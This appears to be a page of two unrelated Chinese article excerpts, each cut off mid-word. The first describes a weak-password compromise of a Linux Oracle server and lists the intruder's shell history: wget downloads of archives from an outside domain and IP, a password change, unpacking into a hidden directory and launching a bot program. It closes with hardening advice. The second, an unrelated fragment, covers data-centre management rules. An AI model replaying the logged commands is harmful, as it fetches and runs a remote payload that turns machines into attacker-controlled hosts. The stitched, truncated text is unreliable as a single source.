安装了Oracle数据库的Linux服务器,由于密码过于简单,导致被变成肉鸡。入侵者登录记录由Logwatch发到了管理员信箱,被管理员发现。入侵者的操作步骤都记录在.bash_history文件里。
提醒:所有帐号口令一定要有强度,避免被猜到。一定要启用日志分析程序。启用Iptables进行安全策略部署。
入侵者操作步骤如下:
cd /var/tmp
wget [url]www.bcsteel.com/~temp/seen.tgz[/url]
wget 208.145.229.25/~temp/sen.tgz
wget 208.145.229.25/~temp/seen.tgz
passwd
tar zxvf seen.tgz
cd .undernet
./pico mech.set
./mech
./mech
cd ..
wg..
作为一个机房管理者,最大的工作动力来源自责任心加上解决问题时的狂热,大多数的机房管理者都不会对于自己的薪金感到满意。然而只是依靠责任心和狂热的解决癖,仍然无法管理好机房,还有可能在离职时遭到下任的唾弃,原因是没有做好交接工作。
机房管理更重要的是制度的约束力和员工的执行力,建立一套完善的机房管理制度是必要的。
1. 机房环境及物理安全管理
1.1环境管理:机房温度、湿度、防尘、配电的管理,需要形成相应的管理制度,巡检制度,巡检表格。如果环境发生变化,需要建立恢复措施。特别是UPS不间..